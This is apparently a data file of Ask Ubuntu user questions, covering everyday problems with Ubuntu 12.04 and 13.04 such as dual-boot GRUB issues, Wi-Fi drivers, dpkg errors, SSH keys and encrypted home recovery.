333508	making ubuntu default os	yes , i know this question has been asked many times , but i 've read through those q & as and have n't figured it out . i 'm trying to have 12.04 boot up upon turning on the computer . as of now , windows 8 boots up instead , and does not load the grub screen at any time . if i do go to the grub screen ( by pressing esc , then f9 , then choosing to boot the partition i have ubuntu on ) the first ( default ) choice is 12.04 . ubuntu is installed from a usb drive and on a separate partition from windows 8 . the only partitioning changes i made from the original ( windows 8 came pre-installed ) was to cut the biggest partition in half-one half for ubuntu , one for windows . the hdd loads in efi mode and ubuntu was installed in efi mode . thanks , i hope i do n't sound as clueless as i am . -- secure boot was disabled when i installed ubuntu . -- many of the questions i read earlier seemed to deal with the order of boot options on grub , which i did n't see as a relevant problem . most of what i read was about grub and using the terminal , but from what i can gather , the problem might be how i installed ubuntu or something else not grub-related . -- boot info : paste.ubuntu.com/5996699/
333509	kubuntu full screen videos	i am running ubuntu with kde . i use two displays , one of them is the laptop 's display and the other one is the external . if i play youtube videos on full screen it starts on the laptop 's display . how could i set that if i start to play a video on youtube or any video on the web , it shows on the screen where it was started ?
333513	wrong magic bytes at the start in lib	i was curious to know how this happened and how to correct it ? setting up gstreamer0.10-plugins-good ( 0.10.31-1ubuntu1.2 ) ... dpkg : error processing gstreamer0.10-plugins-good ( -- configure ) : subprocess installed post-installation script was killed by signal ( segmentation fault ) , core dumped setting up libgl1-mesa-glx-lts-quantal ( 9.0.3-0ubuntu0.4~precise1 ) ... /sbin/ldconfig.real : /usr/lib/x86_64-linux-gnu/libxv.so.1 is not an elf file - it has the wrong magic bytes at the start . aborted ( core dumped ) dpkg : error processing libgl1-mesa-glx-lts-quantal ( -- configure ) : subprocess installed post-installation script returned error exit status 134 dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libgl1-mesa-glx | libgl1 ; however : package libgl1-mesa-glx is not installed . package libgl1-mesa-glx-lts-quantal which provides libgl1-mesa-glx is not configured yet . package libgl1 is not installed . package libgl1-mesa-glx-lts-quantal which provides libgl1 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libglu1-mesa : libglu1-mesa depends on libgl1-mesa-glx | libgl1 ; however : package libgl1-mesa-glx is not installed . package libgl1-mesa-glx-lts-quantal which provides libgl1-mesa-glx is not configured yet . package libgl1 is not installed . package libgl1-mesa-glx-lts-quantal which provides libgl1 is not configured yet . dpkg : erno apport report written because the error message indicates its a followup error from a previous failure . everything i have installed through the terminal i get this at the end : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i imagine this is where i am getting an error everytime i try to install something with sudo apt-get whatever . my setup is windows 7 , virtualbox , ubuntu 12.04 x64 . i did install guest additions but i cant seem to figure out how to update this . i do have root access . i would like to learn why this was n't installed , if it was a bad download copy and if i should delete the virtual session , download a new copy and start over again . any input on how i can learn how to correct this would be great or what could have caused this .
333515	can not ssh with publickey into ubuntu 13.04 cloud instance	i 'm running ubuntu 13.04 in an openstack instance . when i created the instance , i specified a keypair , and i may ssh into the box with the command : [ laptop ] $ ssh -i keypair.pem ubuntu @ my-instance i do n't know what magic openstack did to make this work , but it just does . now i would like to set up `` normal '' public-key authentication . i ca n't even get this to work so as to login from the instance to localhost ; it always asks for my password ! i tried : [ my-instance ] $ cd ~/.ssh [ my-instance ] $ ssh-keygen -t rsa [ my-instance ] $ echo id_rsa.pub > > authorized_keys [ my-instance ] $ ssh localhost password : _ i do this all the time with `` normal '' servers ; i checked that the permissions on the private key and authorized_keys files , and also tried dsa & ecdsa keys . the output of ssh -v is not very illuminating ( see below ) . can anyone shed some light on my situation ? ... debug1 : found key in /home/ubuntu/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/ubuntu/.ssh/id_rsa ( 0x7f86d8041ec0 ) debug1 : authentications that can continue : publickey , keyboard-interactive debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/ubuntu/.ssh/id_rsa debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey , keyboard-interactive debug2 : we did not send a packet , disable method debug1 : next authentication method : keyboard-interactive ...
333519	wi-fi is not working for ubuntu 12.04 ( precise pangolin )	wi-fi is not working for my ubuntu installed on windows 7 . however it 's working when shifting to the windows environment . i have dual operating systems on my machine . here are outputs of a few commands : lshw -c network : *-network unclaimed description : network controller product : bcm43228 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7e00000-f7e03fff *-network description : ethernet interface product : netxtreme bcm5761 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth0 version : 10 serial : b8 : ca:3a : c4:3f : dd capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 firmware=5761-v3.80 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : f7c10000-f7c1ffff memory : f7c00000-f7c0ffff output of : rfkill list all : 0 : hci0 : bluetooth soft blocked : no hard blocked : no output of : ifconfig eth0 link encap : ethernet hwaddr b8 : ca:3a : c4:3f : dd up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:6446 errors:0 dropped:0 overruns:0 frame:0 tx packets:6446 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3821480 ( 3.8 mb ) tx bytes:3821480 ( 3.8 mb ) output for : lspci -nn | grep 0280 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43228 802.11a/b/g/n [ 14e4:4359 ] output for cat /etc/network/interfaces auto lo iface lo inet loopback how do i sort out this issue ?
333522	unable to acess universe repository	i 'm trying to access all of the repositories but i am unable to change the settings in the software center , command line , or right from the source list . i have a hypothysis that it may be due to unistalled updates but when i run `` sudo apt-get install update '' it says that it is unable to locate package update . help ?
333523	copy files but skip errors	a friend has a failing hard drive , and hasnât received a new hard-drive to clone to yet . he wants to copy the files to an external drive but the copy function keeps failing on some error ( which has to do with the hard drive failing ) i would use ddrescue , but the we do n't have room to back up the entire partition . i tried to used ddrescue to copy the home folder to a back up device , but this did not work either . is there any program ( cli ) that can copy files , but ignore disk errors ? is there some way to make $ cp ignore disk-read-errors ?
333526	why my website work on : http : //example.com but on www.example.com not working ?	< virtualhost *:80 > servername www.example.com serveralias example.com alias /static/ /home/ubuntu/proj/proj/static/ documentroot /home/ubuntu/proj wsgiscriptalias / /home/ubuntu/proj/proj/index.wsgi errorlog /var/log/apache2/error.log loglevel warn customlog /var/log/apache2/access.log combined < /virtualhost > why my website work on : http : //example.com but on www.example.com not working ? edit : if i run www.example.com in browser i have : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . from http : //example.com work fine .
333529	what server control panels are available for ubuntu server ?	as a dedicated ubuntu server or as a vps , i am looking for a web control panel , something like cpanel which is something like a web administrator for a server . i have not used any on linux since i do everything through the terminal , but still want to know what i can use in the case i have to recommend ubuntu server with such an application installed .
333533	access c : drive in ubuntu after wubi install	i use ubuntu for downloading and i want to move the files to my c : drive so that when i run windows i can access the files . how do i do that ?
333534	installing epson wf-3520	the gui printer install does not have the driver available . i downloaded the linux drivers for the printer from the epson website , and used the ppd to install . returns a cups error . installed the printer via localhost:631 . it installed , but said it was missing a filter . any ideas on how to get all the files where they need to be ? thanks !
333535	what is the best ubuntu version for my hp tc4200 netbook ?	which version of ubuntu should i load on my laptop which has 768 mb ram and just 40 gb hard drive space so that it runs smoothly and looks nice ?
333537	b43 wireless ubuntu 12.10 retina mac pro	ca n't access the usb wifi documentation . so because of that i ca n't download the drivers for wifi . i have no ethernet connection and i need to get my wifi to work .
333539	installing ubuntu 13.04 on ideapad u510 after deleting all partitions	here is my problem . i purchased a lenovo ideapad u510 . i switched the boot mode to legacy , started the ubuntu live cd ( via usb ) , deleted all partions on the 24gb ssd as well as the 500gb hdd and started installing ubuntu . that 's what i always do , because i like to start with fresh partition tables when i install an operating system . but this time i ran into serious trouble . the hdd just does n't play along . for some reason i had to install everything on /dev/sda , which is the 24gb ssd . i did create a partition on /dev/sdb ( for /home ) but could n't use it . i do n't remember what the problem was . well , the installation was successful . since than a message kept popping up all the time , telling me about a defect hard drive . i deleted from /dev/sdb1 ( partition on the 500gb hdd ) and the message did n't show up anymore . but still , i am stuck with a system of just 24gb in total of external memory , although there is a 500gb hard drive in that machine . it is there in /dev/ as /dev/sdb , but gparted /dev/sdb now gives me the message `` error opening /dev/sdb : no medium found '' . apparently the ssd and hdd are supposed to work together in some kind of raid-like fashion . unfortunately i screwed that up when i deleted all the original partitions . i know nothing about this stuff and ubuntu does n't either . does anyone know how to fix this ? i just want to have ubuntu on that machine and be able to use both disks .
333546	virtual box error after reinstallation of 12.04 64bit	i was trying to uninstall wine , but the command i got from this site destroyed my ubuntu machine . the command was `` sudo apt-get remove wine* '' or -- purge in place of remove would do same thing . it uninstalled everything . luckly i had everything on an external hdd . so i reinstalled 12.04 64bit . started up virtual box , made a virtual machine for 12.04 32bit . ( was going to test wine apps in it ) . the installation process was ok. but after reboot of the virtual machine , i get low graphics window at bootup . then i deleted and tried again . same thing . i gave the virtual machine : 2 cpu cores 2gb ram 128mb video ram 3d & 2d acceleration . 16gb hdd . my ubuntu 64bit machine has : amd 4 core 16gb ram nvidia gtx 650 1tb+ it was working before the melt down . soo im not getting it ...
333548	how do i setup windows samba sharing on my second hard drive so that all users can create and delete files in unity ?	how do i setup windows samba sharing on my second hard drive so that all users can create and delete files in unity ? i need to setup samba with admin privileges .
333550	does a sidebar like google desktop sidebar exist for ubuntu ?	does a sidebar like google desktop sidebar exist for ubuntu ? i want to see commodity prices , stock tickers , cpu performance , etc . out of the corner of my eye . thx .
333551	13.04 reboot from terminal	when i try to reboot my system from the terminal it dow n't work . i type sync sudo reboot now and this is supposed to write the cache to disk , the n reboot . instead it closes my xwindows , and leaves me at a shell command that ends with # . is this expected behavior ?
333552	unexpected system failure	this is a fresh install of ubuntu 12.10 . i did not uninstall anything . i did add the following though : • google-musicmanager-beta • musicbrainz picard • clementine • ps3mediaserver here are my problems : 1 . computer suddenly fails 2 . monitor loses video signal ( vga ) 3 . monitor goes blank as if pc is off . 4 . i have to restart the computer in order to start using it again . it 's been happening for about two months now and i ca n't figure out why . i tried checking the system logs , but nothing stands out . i do n't really know what i 'm reading though . i think it 's chrome , unlikely though , is there any way i can check chrome logs ? this is becoming really annoying , can anyone lead me in the right direction please ? here is the sys.log file ( only showing today 's though 17th august 2013 ) http : //paste.ubuntu.com/5995804/it happened around 12:57 , really hope this helps guys , thanks alot .
333560	how to set screen resolution to 1280x960 in ubuntu 12.04 lts	here is the output of xrandr : $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1280x960_60.00 59.9 960p 60.0 1280x1024_60_new ( 0xc9 ) 138.5mhz h : width 1280 start 1368 end 1504 total 1728 skew 0 clock 80.2khz v : height 1024 start 1025 end 1028 total 1069 clock 75.0hz
333561	why does an external usb hub show up under different usb bus/port numbers than other devices plugged into the same port ?	i 'm working on setting up a system where i want to have certain devices always named the same way when they are plugged into certain ports . i originally set up a udev rules file with the devices plugged directly into the computer . so i had rules like : action== '' add '' , kernel== '' < namepattern > '' , kernels== '' 7-3 '' , symlink+= '' < newname > '' where 7-3 specified a specific usb port on a pci card in the computer ( i figured out the numbers for each port using dmesg or udevadm info -q path -n < devicename > ) . however , i now need to plug the devices into a usb hub to allow them to be further away from the computer . when i plug the usb hub into that same port , it shows up under the number 4-5 instead of 7-3 , which confuses me . so , devices plugged into the hub end up under numbers like 4-5.2 instead of 7-3.2 like i would have expected . as i understand it , the first number before the dash indicates which usb bus the device is on , while the string of numbers after the dash indicate the port number for each successive hub that the device is plugged into . so , it does n't make sense to me why those numbers would suddenly change to 4-5 when i plug a hub in when they 've always been 7-3 for everything else i 've plugged into that port . i would expect the earlier numbers to stay the same , but with an extra port number tacked on to the end to indicate that it 's going through another usb hub . given that the first hub is numbered 4-5 , the numbering does follow my expectations when i daisy chain a second hub in . i end up with devices under numbers like 4-5.2.x or 4-5.3.x depending on which port on the first hub that i plug the second hub into . so , the 4-5 part stays the same , while the port numbers on the first and second hubs get tacked on . i 'm wondering why the first hub shows up with the number 4-5 instead of 7-3 like everything else plugged into that port ? apparently , i 'm missing part of the understanding of how the numbering works in different situations . update : i played around with the system some more , and it turns out that the weird renumbering only happens when i plug the usb hub into one of the ports on the pci card . when i plug it into the ports on the motherboard ( or on front of the computer , which just goes to the mobo anyway ) , it keeps the same numbers as i would expect . i still do n't understand why this would happen even with the pci card , but at least the renumbering appears to be consistent . so , i can still set up rules that will work . if anyone has any good intuition on what 's happening , i 'm still curious to understand what 's going on .
333563	error starting netflix-desktop ubuntu 13.04	hi i 'm trying to use the netflix desktop application on my ubuntu 13.04 machine . after following these instructions i 've run into a couple of errors . attempting to open the application through the hud gives me unable to test extended attributes at location '/home/username/.wine-browser ' . trying to open it through the command line gives me a bit of a different error : traceback ( most recent call last ) : file `` /usr/share/wine-browser-installer/test-xattr '' , line 3 , in < module > import xattr importerror : no module named xattr i 've gone through and attempted to install the xattr python module : https : //pypi.python.org/pypi/xattr but , running python setup.py install gives me a long list of errors involving gcc ... i 've also found this , but deleting/renaming .wine-browser did n't work - i followed this . does anybody have any idea how to fix this issue ? having netflix for ubuntu would be a major plus for me ! thanks !
333570	failed to load session `` ubuntu '' problem ( maybe a error with compiz ? )	i was fooling around in a program ( i forgot what it 's called ) and i had just seen a thing that made it so i could have multiple desktops at once . when i decided i did n't want it anymore , i thought that i had put it on from compiz ( since compiz had options for the multiple desktops ( called cube i think ) , and so i disabled everything with the name `` cube '' in it . i closed my computer and once i went to login into my account , i saw that the bar on the side had disappeared . i went to restart and once i was back at the login screen , i decided to go see if i had the same problem in the guest account . i went in it and the bar was still there , untouched . i decided that i should uninstall compiz because the thing that i deactivated that caused the problem was from that . i uninstalled it and when i restarted/came back on the login screen , i entered my password to go onto my main account and i received the message : failed to load session `` ubuntu '' . i then tried with my guest account , but i had the same problem on it too . now i 'm screwed in windows 8 and i 'm wondering what i can do to fix it . i 've tried something about writing something in the command box that you access by pressing ctrl-alt-f3 ( the root terminal i believe ) . when it asks me my password i write and i have a problem where it tells me that i wrote the wrong password . i 've tried it enough times to know that there 's a problem with the program .
333577	network card is not working , after installing ubuntu on my dell all-in-one 19	my original os was windows vista home . i 'm relatively new to linux , so this is pretty difficult on my end . after looking up other forum topics , i ended up typing lspci|grep net and the result was : 04:00.0 network cotroller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 06:00.0etheret controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 ) i 'm not sure where to go from here though .
333579	installation on toshiba dx1215-d2101	i have a toshiba dx1215-d2101 that i can not install ubunto on . i have tried both the dvd and usb methods . thanks to a `` critical '' bios update from toshiba i had to replace the motherboard . the replacement is a regza insydeh2o rev 3.5 , bios version 2.30 , ec version 1.40 . all i get is an options screen then everything goes black . i tried the link that was referred to but it wo n't allow me to install alongside windows 8 , just delete it and install ubunto .
333584	when i go in the ctrl+alt+f1-f6 , the password does n't work	i ca n't do commands in the ctrl+alt+f1-f6 . when i do a command , it asks me my password . when i write it , it does n't work . i 've tried it enough times to know that it 's broken/there 's a problem .
333588	realtek rtl8723ae driver not working in linux kernel 3.5.0-37-generic version	after lot of searching i found out that my linux kernel is 3.5.0-37-generic and i am unable to install my wireless lan card driver which is realtek rtl8723ae . for some reason when i try to command make after downloading all those file by wget it shows 2 errors . i just upgraded my linux headers files last night . but it still did not worked for me right from the beginning even before the upgrade by the update manager . can anyone help on this please ? ? it 's really problematic as i need to login from other 's computers to make this posts . if it still does not work , i guess i have to quit using linux as i a pc is worthless without internet . thanks in advance .
333595	indicator problem	i 'm using ubuntu 12.04 . well , i installed system monitor indicator to show the internet transfer speed in the top panel . but it shows that indicate kind of in the middle of all the icons . so , when the network up/down , the icons left to the indicator dances between left and right . like , sometimes upload is 554kb/s and download is 721kb/s , and sometimes they are 2.1mb/s and 1.3mb/s . so it became kind of annoying . is there any way that i can move that to the left so that it can change the network independently ? http : //screencloud.net//img/screenshots/e27f771a4600f39e9901de1b5cc2b805.png http : //screencloud.net//img/screenshots/a312e47953ae61001eefa397c71fd651.png
333597	3rd physical drive no longer found	using ubuntu 12.04 64 bit , i had the ubuntu 12.04 on one of my two original 320 gb hd , and a plethora of old backup files on the other . a few years ago , i added a 1 tb hd and have been saving my recent backups to it using back in time . as of yesterday , the 1 tb hd does not appear in devices . i checked the power and data plugs to this drive and they appear normal . could the drive have suddenly gone dead or is there something else that i should check ? disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002be96 device boot start end blocks id system /dev/sda1 * 2048 1949333503 974665728 83 linux /dev/sda2 1949335550 1953523711 2094081 5 extended /dev/sda5 1949335552 1953523711 2094080 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002e221 device boot start end blocks id system /dev/sdb1 * 63 353703104 176851521 83 linux /dev/sdb3 353703934 625137344 135716705+ 5 extended /dev/sdb5 614020428 625137344 5558458+ 82 linux swap / solaris /dev/sdb6 353703936 609830911 128063488 83 linux /dev/sdb7 609832960 614019071 2093056 82 linux swap / solaris partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 2144 mb , 2144337920 bytes 255 heads , 63 sectors/track , 260 cylinders , total 4188160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0f1d0188 disk /dev/mapper/cryptswap1 does n't contain a valid partition table brooks @ brooks-system-product-name : ~ $ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002be96 device boot start end blocks id system /dev/sda1 * 2048 1949333503 974665728 83 linux /dev/sda2 1949335550 1953523711 2094081 5 extended /dev/sda5 1949335552 1953523711 2094080 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002e221 device boot start end blocks id system /dev/sdb1 * 63 353703104 176851521 83 linux /dev/sdb3 353703934 625137344 135716705+ 5 extended /dev/sdb5 614020428 625137344 5558458+ 82 linux swap / solaris /dev/sdb6 353703936 609830911 128063488 83 linux /dev/sdb7 609832960 614019071 2093056 82 linux swap / solaris partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 2144 mb , 2144337920 bytes 255 heads , 63 sectors/track , 260 cylinders , total 4188160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0f1d0188 disk /dev/mapper/cryptswap1 does n't contain a valid partition table brooks @ brooks-system-product-name : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk ├─sda1 8:1 0 929.5g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part └─cryptswap1 ( dm-0 ) 252:0 0 2g 0 crypt [ swap ] sdb 8:16 0 298.1g 0 disk ├─sdb1 8:17 0 168.7g 0 part ├─sdb3 8:19 0 1k 0 part ├─sdb5 8:21 0 5.3g 0 part ├─sdb6 8:22 0 122.1g 0 part └─sdb7 8:23 0 2g 0 part sr0 11:0 1 1024m 0 rom sr1 11:1 1 1024m 0 rom brooks @ brooks-system-product-name : ~ $
333600	not a problem per se , but at what times does the gnome live wallpaper in 3.4 change ?	i 've been looking online for the location of the xml file that says how often the wallpaper changes and i ca n't find it , anyone know where it is ? or what time the wallpaper changes ? it 's really bugging me that i do n't know : )
333601	ssh and scp help	i 'm a university student , and very new to ssh and scp ... and new to programming . the newest assignment given to us requires accessing libraries that are only on the student server at university . to work at home , they said to use ssh . so i 've done that , and i can use ssh to log on to the student server , so that i can compile using the libraries stored there ( c++ programming ) however , i 'm not sure how to do either : compile the files on my local computer in the student log-in terminal . or use scp to copy the files i 'm working on to my @ student folder , so that i can then compile while logged in . with regards to b ) i 've tried the following command : scp mike @ ubuntu : /a1644923/testscp a1644923 @ uss.cs.adelaide.edu.au : a1644923 but then i get : ssh : connect to host ubuntu port 22 : connection refused cp : can not stat `/a1644923/testscp ' : no such file or directory a1644923 @ uss.cs.adelaide.edu.au 's password :
333606	xbindkeys : conflicting program	so my issue is i just reinstalled ubuntu 13.04 and as always i install xbindkeys and set up my search button to be middle click and the scroll wheel side clicks to copy/paste . however it was working but after a reboot it did n't start . tried to manually start but nothing , and xbindkeys -n shows * warning * please verify that there is not another program running which captures one of the keys captured by xbindkeys . it seems that there is a conflict , and xbindkeys ca n't grab all the keys defined in its configuration file . how can i find out what is conflicting with xbindkeys ? i disabled the search key shortcut in the settings > keyboard which worked last time but this time its not helping .
333609	aptana studio 3 does n't have a launcher icon	when running aptana studio 3 , the icon in the unity launcher is a grey square with a question mark . the icon is present in the dash . aptanastudio3.desktop : [ desktop entry ] version=1.0 encoding=utf-8 name=aptana studio 3 genericname=integrated development environment comment=aptana strudio 3 integrated development environment exec=/opt/aptana_studio_3/aptanastudio3 % f tryexec=/opt/aptana_studio_3/aptanastudio3 icon=aptana.xpm startupnotify=true startupwmclass= '' aptana studio 3 '' terminal=false type=application mimetype=text/xml ; application/xhtml+xml ; application/x-javascript ; application/x-php ; application/x-java ; text/x-javascript ; text/html ; text/plain categories=gnome ; development ; ide ;
333616	virtualbox drag n drop is n't working	i followed the steps but still ca n't drag and drop files to virtualbox guest os . i went to settings , general , advanced , clicked bidirectional on both shared clipboard and drag n drop and i still ca n't drag or copy anything to the guest os ( win7 ) . am i missing something ?
333617	keyboard buttons are not working at the time of changing password	when i forget my admin user passwrd i use the way of recovery mode , i got the step of changing passwrd successfully like this ... ... ... recovery mode/root/ # # mount -rw -o remount/ passwd /enter new passwd but in the last step my keyboard buttons is not working in shortly my problem is that my keyboard buttons is not working at the time of entering new password but after when i click on the enter button two time , my keyboard gets normally ... .
333621	imac keyboard not connecting to grub	i recently installed ubuntu on my late 2011 imac 27'on a separate partition to osx mavericks and found after accidentally disabling bluetooth in ubuntu and rebooting , my keyboard not being recognized in grub . the first time it automatically booted into ubuntu but now it is stuck at the os selection screen and i have no possible way to select an os . this is a work computer and is very important so any help would be greatly appreciated ! thanks , gabriel .
333623	suspend resume works , but unable to use computer	when i suspend and resume from suspend , i see my screen as it was left but can not use it and caps lock does not work . when i run pm-suspend before loading x11 , i am able to see my last command and to type onto the screen and make new lines , but i am not given the next line with which to enter commands . i would prefer to get some directions as to how i can debug this ( as likely no one knows this system precisely ) . nevertheless , i am using a mac mini server 2012 with intel hd graphics 3000 and ubuntu 13.04 kernel version 10.x and i just recently installed the intel graphics drivers ( i used to have only a blank screen on resume ) .
333628	splitting sd file	i have one sd file of 3.5 gb size.i want to split it in ~200mb fragments.i dont have much coding knowledge.please tell me various tools and methods for the same.i have windows 7 and ubuntu 12.04 systems .
333640	cp command to exclude certain files from being copied	is there a way to use command 'cp ' to copy a directory and exclude certain files/sub-directories within it ?
333645	update ubuntu phone from nexus 4 directly	im using the ubuntu touch/phone on my new nexus 4 ( ordered it to try ubuntu on it ) . i was asking myself how i can update the phone with daily builds . i know about the http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/ preinstalled images but also saw that on my phone , if i go to settings/updates/ show me that there is an update available . if i try this , it says `` you can update from version 0 to version 201 ... '' and its about 250mb of download size , after a few minutes ubuntu tell me to reboot my phone . if i accept that i found myself in the bootloader . if i reboot from here the phone is not updated . if i search again for updates ( settings/updates/ ) the same update shows up . is the build in update function only a dummy ? or am i doing wrong here ? do i have to choose another option in the bootloader to install the latest updates ? or is an update only possible from the shell with the andriod device bridge ( adb ) ?
333646	winegstreamer broken with > =glib-2.32.0 , how to check the glib version in ubuntu ?	i am a novice to ubuntu and do n't know which keyword should be put in google . i wine a game but the game could n't play a video . someone tell me that you may come across the bug in wine , but i 'm not sure if i have the same bug in my ubuntu12.04 . i have the wine1.6 installed . here is the wine bug link : http : //bugs.winehq.org/show_bug.cgi ? id=30557 i will appreciate it if anyone tell me how to check the glib version .
333653	how can i boot linux and windows with grub ?	after installation of ubuntu 12.04 lts , booting from hard disk option leads to loading of grub . all i see is the following : grub > i do n't know what to do , even with the `` help '' option . i do n't understand how to manage with commands of grub . how can i boot linux and windows with grub ?
333655	no youtube install	abhimanyu @ abhimanyu : ~ $ sudo apt-get install -y ubuntu-restricted-extras [ sudo ] password for abhimanyu : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how do i solve this problem ?
333657	while youtube video selected to play it shows me that div : is error	while youtube video selected to play it shows me that div : is error why it shows like this andhow to solve this type of errors
333658	did not tick mark options during ubuntu installation . [ read detail ]	while installing ubuntu , the first step was to select whether i want to download and install 3rd party updates and installations ( codecs , etc . ) , which i had not selected that time because of slow internet . so now that it is installed , how am i supposed to get all those 3rd party softwares , drivers , codecs or updates ? i had not selected both the tick marks at the first step of installation process .
333660	how do i install oss on ubuntu raring	as the title says : `` how do i install oss on ubuntu 13.04 ? '' also i 've read on a few forums that alsamixer is supposed to have some tone/bass settings ... or did it used to have them ? anyway ... do n't ask why , just tell me how if you know it 's working . do n't point me to : https : //help.ubuntu.com/community/opensound that guide failed for me . maybe i 'm too noob to follow it . please , i need a step by step tutorial . i ca n't find any guide to do so . also do n't point me to arch linux . i tried that yesterday , and gave up due to arch 's lack of an installation gui .
333662	can not mount encrypted home after password change , ecryptfs not configured ( no passphrase set )	i recently forgot my user password from a relatively fresh ubuntu 13.04 installation ( dual-boot with windows 7 , latter more heavily used ) . during setup , i had selected the encrypted home directory option but unfortunately skipped the step asking me to record a passphrase . i managed to set a new password for my account by booting into single-user mode , but as described in `` ca n't login after password change ( ecryptfs ) '' , i am thrown back to the login manager when trying to use my new password . the answer to aforesaid question linked me to annoyance changing password with ecryptfs , which suggests running ecryptfs-mount-private , but unfortunately that merely returns error : encrypted private directory is not set up properly . does ecryptfs set a default passphrase in such instances , or if not , is there any other way to recover my data ? ( said data largely consists of a few saved image files and oolite savestates , so i would n't mind a total loss that much âś but it 's the principle that matters here . ) if not , would the easiest way to get a usable system again be a partition wipe and reinstall ? ( in this case i would probably want to delete the single partition set by ubuntu setup and define multiple partitions myself â advice on what amount of swap space is recommended on a 64bit system with 8gb ram would be welcome . )
333664	disk error occurred	i just installed ubuntu 13.04 alongside my windows 8 , but after that my windows 8 is not loading . a disk error occurred it says . then i restored the mbr using boot repair , but again it is showing the same thing . i am new to linux .
333666	ubuntu touch wifi password issues on nexus 7	i have just installed ubuntu touch on my nexus 7 . i use ubuntu on my pc and all of my work computers and love it which is why i decided to try it out on the nexus . it has all loaded and i can connect to open wifi networks but when i choose a password protected wifi network there is nowhere to enter a wifi password . i have looked and not seen anyone else with this issue . what am i doing wrong ?
